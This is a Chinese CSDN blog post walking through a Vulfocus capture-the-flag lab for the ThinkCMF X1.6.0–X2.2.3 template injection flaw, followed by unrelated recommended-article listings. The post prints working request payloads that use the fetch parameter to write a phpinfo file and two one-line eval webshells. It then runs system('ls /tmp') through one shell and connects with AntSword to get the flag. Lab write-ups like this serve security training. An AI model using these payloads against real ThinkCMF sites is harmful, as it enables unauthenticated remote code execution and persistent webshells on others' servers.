Vulfocus靶场之ThinkCMF X1.6.0-X2.2.3文件包含

于 2024-09-12 17:16:40 发布
阅读量358 收藏 3
点赞数 11
分类专栏: 文件包含漏洞 文章标签: 网络安全 渗透与防御 php 文件包含 CTF比赛 漏洞利用 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/142181378
版权

漏洞描述:

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。

远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。

影响版本:

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

开启vulfocus靶场,打开链接:

验证漏洞:

/?a=display&templateFile=README.md

写入phpinfo()语句:

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php phpinfo(); ?>')</php>

访问shell.php文件:

http://ip:port/shell.php

写入一句话木马:

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('webshell.php','<?php @eval($_POST[123]); ?>')</php>

(意思是创建webshell.php木马,并且POST传参123)

出现空白就正常,若是出现报错就说明没有正常创建webshell.php

中国蚁剑连接:

http://ip:port/webshell.php

成功得到flag:

flag-{bmhf8969957-8a73-48d2-933b-abc28ac523bc}

或者用另一种方法:

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php eval($_GET["NanYuan"]);?>')</php>

(意思是创建1.php木马,并且GET传参NanYuan)

还是一样的出现空白就正常

/1.php?NanYuan=system("ls /tmp");

一样获取到flag

南暮思鸢
关注
  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现-thinkcmf-文件包含vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1717
【thinkcmf-文件包含】public函数
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 855
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
thinkcmf 文件包含 x1.6.0-x2.2.3 已亲自复现
qq_42430287的博客
12-27 800
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2受害者IP:192.168.63.129:9390
ThinkCMF文件包含x1.6.0-x2.2.3
m0_65150886的博客
01-22 479
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。
onnxruntime-1.6.0-cp38-cp38-linux_armv7l.whl.zip
06-10
2. **onnxruntime-1.6.0-cp38-cp38-linux_armv7l.whl**:这是核心文件,包含了ONNX Runtime库的二进制代码,适用于Python 3.8版本,并且是为ARMv7架构的Linux系统优化的。 安装ONNX Runtime的步骤通常包括: 1. ...
tree-1.6.0-10.el7.x86_64.rpm
04-17
tree 命令英文理解为树的意思,其功能是是创建文件列表,将目录所有文件以树状的形式列出来。是一款在颜值上优先于ls的命令。本次上传的安装包适用于红帽7、centOS7 linux中的tree命令默认并不会安装, [root@...
torch-1.6.0-cp36-cp36m-linux_aarch64.whl
08-04
官网提供了下载地址:https://forums.developer.nvidia.com/t/pytorch-for-jetson-nano-version-1-5-0-now-available/72048,我这边下载好上传到csdn。
PCL-1.6.0-AllInOne-msvc2010-win64.part1.rar
04-09
日常分享:pcl是功能强大的三维点云处理库,资源为1.6版本,可直接安装,自带64位debug/release动静态链接库和第三方库,适用于VS2010。
Flume-ng-1.6.0-cdh.zip
04-08
Flume-ng-1.6.0-cdh.zip 内压缩了 3 个项目,分别为:flume-ng-1.6.0-cdh5.5.0.tar.gz、flume-ng-1.6.0-cdh5.7.0.tar.gz 和 flume-ng-1.6.0-cdh5.10.1.tar.gz,选择你需要的版本。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 650
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
Redis 多线程模型详解
lssffy的博客
09-11 569
在 Redis 的早期版本中,Redis 采用了典型的单线程模型,即所有的客户端请求都是由 Redis 的主线程依次处理的。具体来说,Redis 使用单线程的事件循环模型来处理客户端的请求和响应,使用了操作系统的selectpoll或epoll来管理多个客户端连接。为什么 Redis 选择单线程?简单性:单线程模型不需要考虑线程间数据竞争问题,避免了锁机制带来的复杂性和潜在的性能开销。避免上下文切换:多线程环境下,线程的上下文切换会引入额外的 CPU 负担,而单线程架构没有这个问题。性能足够。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 360
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
以太坊开发环境
禅与代码的艺术
09-07 1243
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 500
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1637
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5 + Swoole实现邮箱异步通知
最新发布
Crazy_shark的博客
09-11 331
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
中间件解析漏洞
m0_73771249的博客
09-05 772
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏。
tree-1.6.0-10.el7.x86_64.rpm包下载
01-15
tree-1.6.0-10.el7.x86_64.rpm是一个用于Linux操作系统的软件包。如果您需要下载这个软件包,首先需要找到一个可信赖的软件源或官方网站。之后,在终端或命令行中使用wget或curl等命令来下载这个软件包。下载完成后,您可以使用rpm命令来安装这个软件包。首先使用rpm -ivh tree-1.6.0-10.el7.x86_64.rpm命令来安装,如果需要卸载可以使用rpm -e tree-1.6.0-10.el7.x86_64.rpm来进行卸载。安装完成后,您就可以在系统中使用tree命令来浏览文件和目录的树形结构了。在使用rpm安装软件包时,可能会出现依赖性的问题,您需要根据系统提示来解决这些问题。安装完成后,建议您对软件进行检查和测试,确保安装成功并且可以正常运行。希望这些信息对您有所帮助,祝您顺利下载并使用tree-1.6.0-10.el7.x86_64.rpm软件包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值